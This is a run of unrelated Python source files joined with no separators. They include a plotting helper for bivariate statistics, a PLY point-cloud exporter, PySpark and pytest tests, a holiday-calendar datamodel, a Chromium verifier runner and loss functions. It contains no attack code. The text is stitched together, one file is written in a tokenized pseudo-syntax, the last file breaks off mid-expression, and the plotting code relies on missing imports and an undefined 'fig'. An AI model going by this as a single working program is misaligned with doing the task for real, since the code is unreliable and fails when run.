COUNTER = 1  # 1-based index of the next free subplot slot


def get_category(df, target_name, categorical_name, columns_name):
    """Return the category dictionary and per-pair column lists.

    Every column is first labelled "categorical" (two or fewer distinct
    values, or listed explicitly in *categorical_name*) or "continous"
    (sic -- the spelling is kept because the labels are returned to
    callers in fin_cat_dict). Each column is then tagged with a pair
    label "target(type)_feature(type)".

    Returns:
        (fin_cat_dict, catg_catg, cont_cont, catg_cont, cont_catg) where
        fin_cat_dict maps column name -> pair label and the four lists
        partition the columns by pair label.
    """
    cat_dict = {}
    fin_cat_dict = {}
    catg_catg = []
    cont_cont = []
    catg_cont = []
    cont_catg = []
    for col in columns_name:
        # Two or fewer distinct values is always treated as categorical.
        if len(df[col].unique()) <= 2 or col in categorical_name:
            cat_dict[col] = "categorical"
        else:
            cat_dict[col] = "continous"
    target_is_catg = cat_dict[target_name] == "categorical"
    for col in cat_dict:
        col_is_catg = cat_dict[col] == "categorical"
        if col_is_catg and target_is_catg:
            fin_cat_dict[col] = "catg_catg"
            catg_catg.append(col)
        elif not col_is_catg and not target_is_catg:
            fin_cat_dict[col] = "cont_cont"
            cont_cont.append(col)
        elif not col_is_catg and target_is_catg:
            fin_cat_dict[col] = "catg_cont"
            catg_cont.append(col)
        else:
            fin_cat_dict[col] = "cont_catg"
            cont_catg.append(col)
    return fin_cat_dict, catg_catg, cont_cont, catg_cont, cont_catg


def is_present(columns_name, categorical_name):
    """Return True if every name in *categorical_name* is an actual column
    of the data; raise ValueError listing the missing names otherwise."""
    missing = [i for i in categorical_name if i not in columns_name]
    if missing:
        raise ValueError(str(missing) + " is not present as a column in the data,Please check the name")
    return True


def clean_str_list(df, lst):
    """Remove, IN PLACE, every column in *lst* that holds string data.

    The in-place mutation is intentional: plot() relies on this side
    effect (via total_subplots) to strip string columns from the shared
    column lists before the individual bivariate_analysis_* helpers run.
    Returns *lst* for convenience.
    """
    # FIX: replaced the original `if res == True` with a direct truthy test.
    rem = [i for i in lst if any(isinstance(n, str) for n in df[i])]
    for j in rem:
        lst.remove(j)
    return lst


def pearson_correlation_cont_cont(x, y):
    """Return the 2x2 Pearson correlation-coefficient matrix of x and y."""
    return corrcoef(x, y)


def bivariate_analysis_cont_cont(cont_cont_list, df, target_name, sub_len, COUNTER, PLOT_ROW_SIZE, PLOT_COLUMNS_SIZE):
    """Scatter-plot each continuous feature against the continuous target,
    annotated with mean/std and the Pearson correlation coefficient.

    Returns (plt, COUNTER) with COUNTER advanced past the drawn subplots.
    """
    clean_cont_cont_list = clean_str_list(df, cont_cont_list)
    if len(clean_str_list(df, [target_name])) == 0 and len(cont_cont_list) > 0:
        raise ValueError("You seem to have a target variable with string values.")
    clean_df = df.dropna()
    for col in clean_cont_cont_list:
        summary = clean_df[col].describe()
        count, mean, std = summary[0], summary[1], summary[2]
        plt.subplot(PLOT_ROW_SIZE, PLOT_COLUMNS_SIZE, COUNTER)
        plt.title("mean " + str(np.float32(mean)) + " std " + str(np.float32(std)), fontsize=10)
        x = clean_df[col]
        y = np.float32(clean_df[target_name])
        corr = pearson_correlation_cont_cont(x, y)
        plt.xlabel(col + "\n count " + str(count) + "\n Corr: " + str(np.float32(corr[0][1])), fontsize=10)
        plt.ylabel(target_name, fontsize=10)
        plt.scatter(x, y)
        print(col + " vs " + target_name + " plotted....")
        COUNTER += 1
    return plt, COUNTER


def evaluate_chi(x, y):
    """Chi-squared association test (categorical feature vs categorical target).

    chi = X^2 = sum((observed - expected)^2 / expected), with
    (r-1)(c-1) degrees of freedom; p-values below 0.05 are significant.
    """
    chi, p_val = chi2(x, y)
    return chi, p_val


def bivariate_analysis_catg_catg(catg_catg_list, df, target_name, sub_len, COUNTER, PLOT_ROW_SIZE, PLOT_COLUMNS_SIZE, bin_size="auto"):
    """Stacked histogram of each categorical feature split by the
    categorical target, annotated with the chi-squared statistic."""
    clean_catg_catg_list = clean_str_list(df, catg_catg_list)
    clean_df = df.dropna()
    target_classes = df[target_name].unique()
    label = [str(i) for i in target_classes]
    # NOTE: a dead counter variable (`c`) from the original was removed.
    for col in clean_catg_catg_list:
        summary = clean_df[col].describe()
        binwidth = 0.7
        if bin_size == 'auto':
            bins_size = np.arange(min(clean_df[col].tolist()), max(clean_df[col].tolist()) + binwidth, binwidth)
        else:
            bins_size = bin_size
        mean, std = summary[1], summary[2]
        plt.subplot(PLOT_ROW_SIZE, PLOT_COLUMNS_SIZE, COUNTER)
        plt.title("mean " + str(np.float32(mean)) + " std " + str(np.float32(std)), fontsize=10)
        x = [np.array(clean_df[clean_df[target_name] == i][col]) for i in target_classes]
        y = clean_df[target_name]
        chi, p_val = evaluate_chi(np.array(clean_df[col]).reshape(-1, 1), y)
        plt.xlabel(col + "\n chi: " + str(np.float32(chi[0])) + " / p_val: " + str(p_val[0]), fontsize=10)
        plt.ylabel("Frequency", fontsize=10)
        plt.hist(x, bins=bins_size, stacked=True, label=label)
        plt.legend(prop={'size': 10})
        print(col + " vs " + target_name + " plotted....")
        COUNTER += 1
    return plt, COUNTER


def evaluate_anova(x, y):
    """One-way ANOVA F-test: tests whether the means of several
    independent groups are equal (generalizes the t-test to 3+ groups)."""
    F_value, pvalue = f_classif(x, y)
    return F_value, pvalue


def bivariate_analysis_cont_catg(cont_catg_list, df, target_name, sub_len, COUNTER, PLOT_ROW_SIZE, PLOT_COLUMNS_SIZE):
    """Box-plot the continuous target grouped by each categorical feature,
    annotated with the ANOVA F-value and p-value."""
    clean_cont_catg_list = clean_str_list(df, cont_catg_list)
    if len(clean_str_list(df, [target_name])) == 0 and len(cont_catg_list) > 0:
        raise ValueError("You seem to have a target variable with string values.")
    clean_df = df.dropna()
    for col in clean_cont_catg_list:
        col_classes = clean_df[col].unique()
        summary = clean_df[col].describe()
        mean, std = summary[1], summary[2]
        plt.subplot(PLOT_ROW_SIZE, PLOT_COLUMNS_SIZE, COUNTER)
        plt.title("mean " + str(np.float32(mean)) + " std " + str(np.float32(std)), fontsize=10)
        x = [np.array(clean_df[clean_df[col] == i][target_name]) for i in col_classes]
        y = np.float32(clean_df[target_name])
        f_value, p_val = evaluate_anova(np.array(clean_df[col]).reshape(-1, 1), y)
        plt.xlabel(col + "\n f_value: " + str(np.float32(f_value[0])) + " / p_val: " + str(p_val[0]), fontsize=10)
        plt.ylabel(target_name, fontsize=10)
        plt.boxplot(x)
        print(col + " vs " + target_name + " plotted....")
        COUNTER += 1
    return plt, COUNTER


def bivariate_analysis_catg_cont(catg_cont_list, df, target_name, sub_len, COUNTER, PLOT_ROW_SIZE, PLOT_COLUMNS_SIZE):
    """Box-plot each continuous feature grouped by the categorical target,
    annotated with the ANOVA F-value and p-value."""
    # String variables are deliberately not stripped here; they are
    # handled by sklearn's chi2/f_classif (matches original behaviour).
    clean_catg_cont_list = catg_cont_list
    clean_df = df.dropna()
    for col in clean_catg_cont_list:
        col_classes = df[target_name].unique()
        summary = clean_df[col].describe()
        mean, std = summary[1], summary[2]
        plt.subplot(PLOT_ROW_SIZE, PLOT_COLUMNS_SIZE, COUNTER)
        plt.title("mean " + str(np.float32(mean)) + " std " + str(np.float32(std)), fontsize=10)
        x = [np.array(clean_df[clean_df[target_name] == i][col]) for i in col_classes]
        y = clean_df[target_name]
        f_value, p_val = evaluate_anova(np.array(clean_df[col]).reshape(-1, 1), y)
        plt.xlabel(target_name + "\n f_value: " + str(np.float32(f_value[0])) + " / p_val: " + str(p_val[0]), fontsize=10)
        plt.ylabel(col, fontsize=10)
        plt.boxplot(x)
        print(col + " vs " + target_name + " plotted....")
        COUNTER += 1
    return plt, COUNTER


def total_subplots(df, lst):
    """Total number of subplots needed.

    NOTE: this also strips string columns from each list in *lst* IN
    PLACE via clean_str_list -- plot() depends on that side effect.
    """
    clean_df = df.dropna()
    return sum(len(clean_str_list(clean_df, i)) for i in lst)


def remove_drop_from_catglist(drop, categorical_name):
    """Remove dropped columns from *categorical_name* (in place), in case
    a name was listed in both; returns the updated list."""
    for col in drop:
        if col in categorical_name:
            categorical_name.remove(col)
    return categorical_name


def plot(data_input, target_name="", categorical_name=None, drop=None, PLOT_COLUMNS_SIZE=4, bin_size="auto", wspace=0.5, hspace=0.8):
    """Bivariate analysis between the target variable and the input features.

    Parameters
    -----------
    data_input : DataFrame
        Input data.
    target_name : str
        Name of the target column (required).
    categorical_name : list
        Categorical columns with more than 2 classes, to distinguish
        them from continuous columns.
    drop : list
        Columns to drop before the analysis.
    PLOT_COLUMNS_SIZE : int
        Number of plots per row; the row count is adjusted accordingly.
    bin_size : int; default="auto"
        Number of bins for the categorical-vs-categorical histograms.
    wspace : float; default=0.5
        Horizontal padding between subplots.
    hspace : float; default=0.8
        Vertical padding between subplots.
    """
    # FIX: the original used mutable default arguments ([]), which are
    # mutated below (remove_drop_from_catglist / clean_str_list) and
    # therefore leaked state across calls.
    if categorical_name is None:
        categorical_name = []
    if drop is None:
        drop = []
    if type(data_input).__name__ != "DataFrame":
        raise ValueError("Make sure input data is a Dataframe.")
    columns_name = data_input.columns.values
    # Drop user-specified columns (is_present raises if any is missing).
    if is_present(columns_name, drop):
        data_input = data_input.drop(drop, axis=1)
        columns_name = data_input.columns.values
        categorical_name = remove_drop_from_catglist(drop, categorical_name)
    else:
        raise ValueError("Couldn't find it in the input Dataframe!")
    if target_name == "":
        raise ValueError("Please mention a target variable")
    # Validate the declared categorical columns and target (both raise on miss).
    categorical_is_present = is_present(columns_name, categorical_name)
    target_is_present = is_present(columns_name, [target_name])
    if categorical_is_present:
        fin_cat_dict, catg_catg_list, cont_cont_list, catg_cont_list, cont_catg_list = get_category(
            data_input, target_name, categorical_name, columns_name)
    # Total number of subplots (this call also cleans the lists in place).
    total = total_subplots(data_input, [cont_cont_list, catg_catg_list, catg_cont_list, cont_catg_list])
    if total < PLOT_COLUMNS_SIZE:
        total = PLOT_COLUMNS_SIZE
    PLOT_ROW_SIZE = ceil(float(total) / PLOT_COLUMNS_SIZE)
    # Draw each pair category; COUNTER threads through so subplots stack up.
    plot, count = bivariate_analysis_cont_cont(cont_cont_list, data_input, target_name, total, COUNTER, PLOT_ROW_SIZE, PLOT_COLUMNS_SIZE)
    plot, count = bivariate_analysis_catg_catg(catg_catg_list, data_input, target_name, total, count, PLOT_ROW_SIZE, PLOT_COLUMNS_SIZE, bin_size=bin_size)
    plot, count = bivariate_analysis_cont_catg(cont_catg_list, data_input, target_name, total, count, PLOT_ROW_SIZE, PLOT_COLUMNS_SIZE)
    plot, count = bivariate_analysis_catg_cont(catg_cont_list, data_input, target_name, total, count, PLOT_ROW_SIZE, PLOT_COLUMNS_SIZE)
    fig.subplots_adjust(bottom=0.08, left=0.05, right=0.97, top=0.93, wspace=wspace, hspace=hspace)
    plot.show()
import os

import numpy as np

# Shared ASCII-PLY header template; {:d} receives the vertex count.
_PLY_HEADER = ('ply\nformat ascii 1.0\nelement vertex {:d}\nproperty float x\nproperty float y\nproperty float z\nproperty uchar red\nproperty uchar green\nproperty uchar blue\nproperty float prob\nend_header')


def save_samples_truncted_prob(fname, points, prob):
    '''
    Save the visualization of sampling to a ply file.
    Red points represent positive predictions.
    Green points represent negative predictions.
    Parameters
        fname: File name to save
        points: [N, 3] array of points
        prob: [1, N] array of predictions in the range [0~1]
    Return:
        None
    '''
    scores = prob.transpose(0, 1).detach().numpy()
    # Colour by thresholded prediction: red for > 0.5, green for < 0.5.
    red = (scores > 0.5).reshape([-1, 1]) * 255
    green = (scores < 0.5).reshape([-1, 1]) * 255
    blue = np.zeros(red.shape)
    columns = np.concatenate([points, red, green, blue, scores], axis=-1)
    return np.savetxt(fname, columns,
                      fmt='%.6f %.6f %.6f %d %d %d %.6f',
                      comments='',
                      header=_PLY_HEADER.format(points.shape[0]))


def save_gallery(preds, samples, names, gallery_id, epoch):
    """Dump the first prediction of a batch to
    <gallery_id>/<parent dir of names[0]>/epoch_XXX/pred.ply."""
    first_pred = preds[0].cpu()
    first_sample = samples[0].transpose(0, 1).cpu()
    first_name = names[0]
    out_dir = os.path.join(gallery_id, first_name.split('/')[-2], "epoch_{:03d}".format(epoch))
    os.makedirs(out_dir, exist_ok=True)
    save_samples_truncted_prob(os.path.join(out_dir, 'pred.ply'), first_sample, first_pred)
from pyspark.sql.types import (
    ArrayType,
    IntegerType,
    StringType,
    StructField,
    StructType,
)

from butterfree.extract.pre_processing import explode_json_column
from butterfree.testing.dataframe import (
    assert_dataframe_equality,
    create_df_from_collection,
)

_JSON_VALUE = '{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}'


def test_explode_json_column(spark_context, spark_session):
    """explode_json_column should add one column per schema field,
    casting values to the declared types (note "c" is cast str -> int)."""
    # arrange
    input_df = create_df_from_collection(
        [{"json_column": _JSON_VALUE}], spark_context, spark_session
    )
    target_df = create_df_from_collection(
        [
            {
                "json_column": _JSON_VALUE,
                "a": 123,
                "b": "abc",
                "c": 123,
                "d": [1, 2, 3],
            }
        ],
        spark_context,
        spark_session,
    )
    json_column_schema = StructType(
        [
            StructField("a", IntegerType()),
            StructField("b", StringType()),
            StructField("c", IntegerType()),
            StructField("d", ArrayType(IntegerType())),
        ]
    )

    # act
    output_df = explode_json_column(input_df, "json_column", json_column_schema)

    # assert
    assert_dataframe_equality(target_df, output_df)
# Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. {'targets':[# { # 'target_name': 'cast_extension_discoverer', # 'includes': ['../../../compile_js2.gypi'], # }, # { # 'target_name': 'cast_video_element', # 'includes': ['../../../compile_js2.gypi'], # }, # { # 'target_name': 'caster', # 'includes': ['../../../compile_js2.gypi'], # }, # { # 'target_name': 'media_manager', # 'includes': ['../../../compile_js2.gypi'], # }, ] }<line_sep>
# Copyright 2012 Viewfinder Inc. All Rights Reserved.

"""Calendar datamodel.

Calendars provide color to a chronology such as the Viewfinder search/
browse tool. Calendars are parsed from the "resources/calendars/"
subdirectory on demand and cached.

TODO(spencer): this is a very rough beginning meant to capture
locale-specific holidays. We use here the holiday calendars provided
by Mozilla. The idea in general is to provide an interface to
arbitrary calendars, such as the wealth of calendars available via
Google's calendar app.
"""

__author__ = '<EMAIL> (<NAME>)'

import datetime
import dateutil
import logging
import os
import time
import vobject

from functools import partial
from viewfinder.backend.base import util


class Calendar(object):
    """Interface to loading ICS iCalendar calendar data."""

    # Path template (relative to this file) for bundled .ics calendars.
    _RESOURCES_CALENDARS_FMT = '../../resources/calendars/%s'
    _DEFAULT_CALENDAR_ID = 'USHolidays.ics'

    # Mapping from locale to holidays calendar.
    # FIX: the original table listed 'en_GB' twice ('EnglishHolidays.ics'
    # and later 'UKHolidays.ics'); in a dict literal the last entry wins,
    # so the effective value was 'UKHolidays.ics' and only that entry is
    # kept here.
    _locale_to_holiday_calendar_map = {
        'ar_DZ': 'AlgeriaHolidays.ics',
        'es_AR': 'ArgentinaHolidays.ics',
        'en_AU': 'AustraliaHolidays.ics',
        'de_AT': 'AustrianHolidays.ics',
        'eu_ES': 'BasqueHolidays.ics',
        'nl_BE': 'BelgianDutchHolidays.ics',
        'fr_BE': 'BelgianFrenchHolidays.ics',
        'de_BE': 'BelgianHolidays.ics',
        'es_BO': 'BoliviaHolidays.ics',
        'pt_BR': 'BrazilHolidays.ics',
        'bg_BG': 'BulgarianHolidays.ics',
        'en_CA': 'CanadaHolidays.ics',
        'es_CL': 'ChileHolidays.ics',
        'zh_CN': 'ChinaHolidays.ics',
        'es_CO': 'ColombianHolidays.ics',
        'hr_HR': 'CroatiaHolidays.ics',
        'cs_CZ': 'CzechHolidays.ics',
        'da_DK': 'DanishHolidays.ics',
        'be_NL': 'DutchHolidays.ics',
        'nl_NL': 'DutchHolidays.ics',
        'et_EE': 'EstoniaHolidays.ics',
        'fi_FI': 'FinlandHolidays.ics',
        'sv_FI': 'FinlandHolidays.ics',
        'fr_FR': 'FrenchHolidays.ics',
        'fy_NL': 'FrisianHolidays.ics',
        'de_DE': 'GermanHolidays.ics',
        'en_HK': 'HongKongHolidays.ics',
        'zh_HK': 'HongKongHolidays.ics',
        'hu_HU': 'HungarianHolidays.ics',
        'is_IS': 'IcelandHolidays.ics',
        'id_ID': 'IndonesianHolidays.ics',
        'it_IT': 'ItalianHolidays.ics',
        'ja_JP': 'JapanHolidays.ics',
        'sw_KE': 'KenyaHolidays.ics',
        'so_KE': 'KenyaHolidays.ics',
        'om_KE': 'KenyaHolidays.ics',
        'kam_KE': 'KenyaHolidays.ics',
        'lv_LV': 'LatviaHolidays.ics',
        'lt_LT': 'LithuanianHolidays.ics',
        'de_LU': 'LuxembourgHolidays.ics',
        'fr_LU': 'LuxembourgHolidays.ics',
        'en_NZ': 'NewZealandHolidays.ics',
        'mi_NZ': 'NewZealandHolidays.ics',
        'nb_NO': 'NorwegianHolidays.ics',
        'en_PK': 'PakistanHolidays.ics',
        'pa_Arab_PK': 'PakistanHolidays.ics',
        'pa_PK': 'PakistanHolidays.ics',
        'ur_PK': 'PakistanHolidays.ics',
        'es_PE': 'PeruHolidays.ics',
        'pl_PL': 'PolishHolidays.ics',
        'pt_PT': 'PortugalHolidays.ics',
        'en_QLD': 'QueenslandHolidays.ics',
        'en_AU_QLD': 'QueenslandHolidays.ics',
        'ro_MD': 'RomaniaHolidays.ics',
        'ro_RO': 'RomaniaHolidays.ics',
        'ru_RU': 'RussiaHolidays.ics',
        'ru_UA': 'RussiaHolidays.ics',
        'uk_UA': 'RussiaHolidays.ics',
        'en_SG': 'SingaporeHolidays.ics',
        'zh_Hans_SG': 'SingaporeHolidays.ics',
        'zh_SG': 'SingaporeHolidays.ics',
        'sk_SK': 'SlovakHolidays.ics',
        'af_ZA': 'SouthAfricaHolidays.ics',
        'en_ZA': 'SouthAfricaHolidays.ics',
        'nr_ZA': 'SouthAfricaHolidays.ics',
        'nso_ZA': 'SouthAfricaHolidays.ics',
        'ss_ZA': 'SouthAfricaHolidays.ics',
        'st_ZA': 'SouthAfricaHolidays.ics',
        'tn_ZA': 'SouthAfricaHolidays.ics',
        'ts_ZA': 'SouthAfricaHolidays.ics',
        've_ZA': 'SouthAfricaHolidays.ics',
        'xh_ZA': 'SouthAfricaHolidays.ics',
        'zu_ZA': 'SouthAfricaHolidays.ics',
        'ko_KR': 'SouthKoreaHolidays.ics',
        'es_ES': 'SpanishHolidays.ics',
        'si_LK': 'SriLankaHolidays.ics',
        'sv_SE': 'SwedishHolidays.ics',
        'de_CH': 'SwissHolidays.ics',
        'fr_CH': 'SwissHolidays.ics',
        'gsw_CH': 'SwissHolidays.ics',
        'it_CH': 'SwissHolidays.ics',
        'trv_TW': 'TaiwanHolidays.ics',
        'zh_Hant_TW': 'TaiwanHolidays.ics',
        'zh_TW': 'TaiwanHolidays.ics',
        'th_TH': 'ThaiHolidays.ics',
        'ku_Latn_TR': 'TurkeyHolidays.ics',
        'ku_TR': 'TurkeyHolidays.ics',
        'tr_TR': 'TurkeyHolidays.ics',
        'cy_GB': 'UKHolidays.ics',
        'en_GB': 'UKHolidays.ics',
        'gv_GB': 'UKHolidays.ics',
        'kw_GB': 'UKHolidays.ics',
        'en': 'USHolidays.ics',
        'en_US': 'USHolidays.ics',
        'es_US': 'USHolidays.ics',
        'haw_US': 'USHolidays.ics',
        'es_UY': 'UruguayHolidays.ics',
        'vi_VN': 'VietnamHolidays.ics',
    }

    # Cache for Calendar objects, keyed by calendar_id.
    _cache = dict()

    def __init__(self, calendar_id):
        """Prepares a calendar for the specified 'calendar_id'."""
        self.calendar_id = calendar_id
        cal_path = os.path.dirname(__file__)
        path = os.path.join(cal_path, Calendar._RESOURCES_CALENDARS_FMT % self.calendar_id)
        with open(path, 'rb') as f:
            self._cal = vobject.readOne(f)

    def GetEvents(self, year):
        """Returns the events from the calendar for the year specified.

        In cases where the calendar does not span the requested year,
        throws a 'NoCalendarDataError' exception.
        """
        events = []
        for event in self._cal.components():
            if event.name != 'VEVENT':
                continue
            name = event.summary.value
            # FIX: getrruleset() was called twice in the original; call once.
            rruleset = event.getrruleset()
            if rruleset:
                # Recurring event: expand occurrences that fall in `year`.
                dates = rruleset.between(datetime.datetime(year - 1, 12, 31),
                                         datetime.datetime(year + 1, 1, 1))
                if len(dates) >= 1:
                    if len(dates) > 1:
                        logging.warning('holiday %s occurs more than once a year: %r' % (name, dates))
                    delta = event.dtend.value - event.dtstart.value
                    dtstart = dates[0]
                    dtend = dtstart + delta
                    events.append({'name': name,
                                   'dtstart': time.mktime(dtstart.timetuple()),
                                   'dtend': time.mktime(dtend.timetuple())})
            else:
                # One-off event: include it only if it starts in `year`.
                dtstart = event.dtstart.value
                dtend = event.dtend.value
                if dtstart.year == year:
                    events.append({'name': name,
                                   'dtstart': time.mktime(dtstart.timetuple()),
                                   'dtend': time.mktime(dtend.timetuple())})
        return events

    @classmethod
    def GetCalendar(cls, calendar_id=None):
        """Attempts to locate a cached version of 'calendar_id'. If none is
        found, attempts to load from disk.
        """
        calendar_id = calendar_id or Calendar._DEFAULT_CALENDAR_ID
        # FIX: dict.has_key() was removed in Python 3; use `in` instead.
        if calendar_id not in Calendar._cache:
            Calendar._cache[calendar_id] = Calendar(calendar_id)
        return Calendar._cache[calendar_id]

    @classmethod
    def GetHolidaysByLocale(cls, locale='en_US'):
        """Attempts to match the specified locale with a holidays calendar.

        Normalizes the locale by replacing '-' with '_'. Falls back to the
        default (US) calendar for unknown locales.
        """
        locale = locale.replace('-', '_')
        calendar_id = (Calendar._locale_to_holiday_calendar_map.get(locale, None)
                       or Calendar._DEFAULT_CALENDAR_ID)
        return Calendar.GetCalendar(calendar_id)
import pytest
import aos_version

from collections import namedtuple

Package = namedtuple('Package', ['name', 'version'])


def _expectation(name, version, check_multi=False):
    """One entry of an expected-packages dict, in the shape aos_version consumes."""
    return {"name": name, "version": version, "check_multi": check_multi}


expected_pkgs = {
    "spam": _expectation("spam", "3.2.1"),
    "eggs": _expectation("eggs", "3.2.1"),
}

# Expectation that allows two acceptable versions of ovs.
_OVS_EXPECTED = {"ovs": _expectation("ovs", ["2.6", "2.7"])}


@pytest.mark.parametrize('pkgs,expected_pkgs_dict', [
    # all found
    ([Package('spam', '3.2.1'), Package('eggs', '3.2.1')], expected_pkgs),
    # found with more specific version
    ([Package('spam', '3.2.1'), Package('eggs', '3.2.1.5')], expected_pkgs),
    # one of several acceptable versions present
    ([Package('ovs', '2.6'), Package('ovs', '2.4')], _OVS_EXPECTED),
    ([Package('ovs', '2.7')], _OVS_EXPECTED),
])
def test_check_precise_version_found(pkgs, expected_pkgs_dict):
    aos_version._check_precise_version_found(pkgs, expected_pkgs_dict)


@pytest.mark.parametrize('pkgs,expect_not_found', [
    # none found
    ([],
     {"spam": _expectation("spam", "3.2.1"),
      "eggs": _expectation("eggs", "3.2.1")}),
    # completely missing
    ([Package('spam', '3.2.1')],
     {"eggs": _expectation("eggs", "3.2.1")}),
    # not the right version
    ([Package('spam', '3.2.1'), Package('eggs', '3.3.2')],
     {"eggs": _expectation("eggs", "3.2.1")}),
    # eggs found with multiple versions
    ([Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5')],
     {"spam": _expectation("spam", "3.2.1")}),
])
def test_check_precise_version_found_fail(pkgs, expect_not_found):
    with pytest.raises(aos_version.PreciseVersionNotFound) as e:
        aos_version._check_precise_version_found(pkgs, expected_pkgs)
    assert list(expect_not_found.values()) == e.value.problem_pkgs


@pytest.mark.parametrize('pkgs,expected_pkgs_dict', [
    ([], expected_pkgs),
    # more precise but not strictly higher
    ([Package('spam', '3.2.1.9')], expected_pkgs),
    ([Package('ovs', '2.7')], _OVS_EXPECTED),
])
def test_check_higher_version_found(pkgs, expected_pkgs_dict):
    aos_version._check_higher_version_found(pkgs, expected_pkgs_dict)


@pytest.mark.parametrize('pkgs,expected_pkgs_dict,expect_higher', [
    # lower precision, but higher
    ([Package('spam', '3.3')], expected_pkgs, ['spam-3.3']),
    # one too high
    ([Package('spam', '3.2.1'), Package('eggs', '3.3.2')], expected_pkgs, ['eggs-3.3.2']),
    # multiple versions, one is higher
    ([Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5'), Package('eggs', '3.4')],
     expected_pkgs, ['eggs-3.4']),
    # multiple versions, two are higher
    ([Package('eggs', '3.2.1'), Package('eggs', '3.4'), Package('eggs', '3.3')],
     expected_pkgs, ['eggs-3.4']),
    ([Package('ovs', '2.8')], _OVS_EXPECTED, ['ovs-2.8']),
])
def test_check_higher_version_found_fail(pkgs, expected_pkgs_dict, expect_higher):
    with pytest.raises(aos_version.FoundHigherVersion) as e:
        aos_version._check_higher_version_found(pkgs, expected_pkgs_dict)
    assert set(expect_higher) == set(e.value.problem_pkgs)


@pytest.mark.parametrize('pkgs', [
    [],
    [Package('spam', '3.2.1')],
    [Package('spam', '3.2.1'), Package('eggs', '3.2.2')],
])
def test_check_multi_minor_release(pkgs):
    aos_version._check_multi_minor_release(pkgs, expected_pkgs)


@pytest.mark.parametrize('pkgs,expect_to_flag_pkgs', [
    ([Package('spam', '3.2.1'), Package('spam', '3.3.2')], ['spam']),
    ([Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5'), Package('eggs', '3.4')], ['eggs']),
])
def test_check_multi_minor_release_fail(pkgs, expect_to_flag_pkgs):
    with pytest.raises(aos_version.FoundMultiRelease) as e:
        aos_version._check_multi_minor_release(pkgs, expected_pkgs)
    assert set(expect_to_flag_pkgs) == set(e.value.problem_pkgs)
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

import file_verifier
import process_verifier
import registry_verifier


class VerifierRunner:
    """Runs all Verifiers."""

    def __init__(self):
        """Constructor."""
        # TODO(sukolsak): Implement other verifiers
        self._verifiers = {
            'Files': file_verifier.FileVerifier(),
            'Processes': process_verifier.ProcessVerifier(),
            'RegistryEntries': registry_verifier.RegistryVerifier(),
        }

    def VerifyAll(self, property, variable_expander):
        """Verifies that the current machine states match the property dictionary.

        A property dictionary is a dictionary where each key is a verifier's
        name and the associated value is the input to that verifier. For
        details about the input format for each verifier, take a look at
        http://goo.gl/1P85WL

        Args:
            property: A property dictionary. (NOTE: the name shadows the
                `property` builtin; kept for backward compatibility.)
            variable_expander: A VariableExpander object.

        Raises:
            KeyError: If the dictionary names an unknown verifier.
        """
        # FIX: dict.iteritems() is Python-2-only; items() iterates the same
        # pairs and works on both Python 2 and 3.
        for verifier_name, verifier_input in property.items():
            if verifier_name not in self._verifiers:
                raise KeyError('Unknown verifier %s' % verifier_name)
            self._verifiers[verifier_name].VerifyInput(verifier_input, variable_expander)
from fastai.sgdr import Callback


class CVAELossCallback(Callback):
    """Placeholder fastai callback for CVAE loss tracking; no behaviour yet."""
<import_stmt>torch<import_stmt>torch.nn.functional<as>F<line_sep>__all__=['kl_loss' 'huber_loss']<def_stmt>kl_loss x y<block_start>x=F.softmax(x.detach() dim=1)<line_sep>y=F.log_softmax(y dim=1)<line_sep><return>torch.mean(torch.sum(x<times>(torch.log(x)-y) dim=1))<block_end><def_stmt>huber_loss error delta<block_start>abs_error=torch.abs(error)<line_sep>quadratic=torch.min(abs_error torch.full_like(abs_error fill_value=delta))<line_sep>losses=0.5<times>(quadratic<power>2)+delta<times>(abs_error-quadratic)<line_sep><return>torch.mean(losses)<block_end>
# Expected parsed result: per-cause global drop statistics (octet and
# packet counters), as consumed by the accompanying parser test.
expected_output = {
    "global_drop_stats": {
        "Ipv4NoAdj": {"octets": 296, "packets": 7},
        "Ipv4NoRoute": {"octets": 7964, "packets": 181},
        "PuntPerCausePolicerDrops": {"octets": 184230, "packets": 2003},
        "UidbNotCfgd": {"octets": 29312827, "packets": 466391},
        "UnconfiguredIpv4Fia": {"octets": 360, "packets": 6},
    }
}
""" Common transformation """<import_stmt>logging<import_stmt>re<import_from_stmt>abc ABC<import_from_stmt>collections namedtuple OrderedDict<import_from_stmt>model.array Array<import_from_stmt>model.enum Enum<import_from_stmt>model.struct Struct<class_stmt>InterfaceProducerCommon(ABC)<block_start>""" Common transformation """<line_sep>version='1.0.0'<def_stmt>__init__ self container_name enums_package structs_package package_name enum_names=() struct_names=() key_words=()<block_start>self.logger=logging.getLogger('Generator.InterfaceProducerCommon')<line_sep>self.container_name=container_name<line_sep>self.enum_names=enum_names<line_sep>self.struct_names=struct_names<line_sep>self.key_words=key_words<line_sep>self.enums_package=enums_package<line_sep>self.structs_package=structs_package<line_sep>self.package_name=package_name<line_sep>self._params=namedtuple('params' 'deprecated description key last mandatory origin return_type since title '<concat>'param_doc name')<block_end>@property<def_stmt>get_version self<block_start><return>self.version<block_end>@property<def_stmt>params self<block_start>""" :return: namedtuple params(name='', origin='') """<line_sep><return>self._params<block_end>@staticmethod<def_stmt>key param:str<block_start>""" Convert param string to uppercase and inserting underscores :param param: camel case string :return: string in uppercase with underscores """<if_stmt>re.match(r'^[A-Z_\d]+$' param)<block_start><return>param<block_end><else_stmt><block_start>result=re.sub(r'([a-z]|[A-Z]{2,})([A-Z]|\d$)' r'\1_\2' param).upper()<line_sep>result=re.sub('IDPARAM' 'ID_PARAM' result)<line_sep><return>result<block_end><block_end>@staticmethod<def_stmt>ending_cutter n:str<block_start>""" If string not contains only uppercase letters and end with 'ID' deleting 'ID' from end of string :param n: string to evaluate and deleting 'ID' from end of string :return: if match cut string else original string """<if_stmt>re.match(r'^\w+[a-z]+([A-Z]{2,})?ID$' 
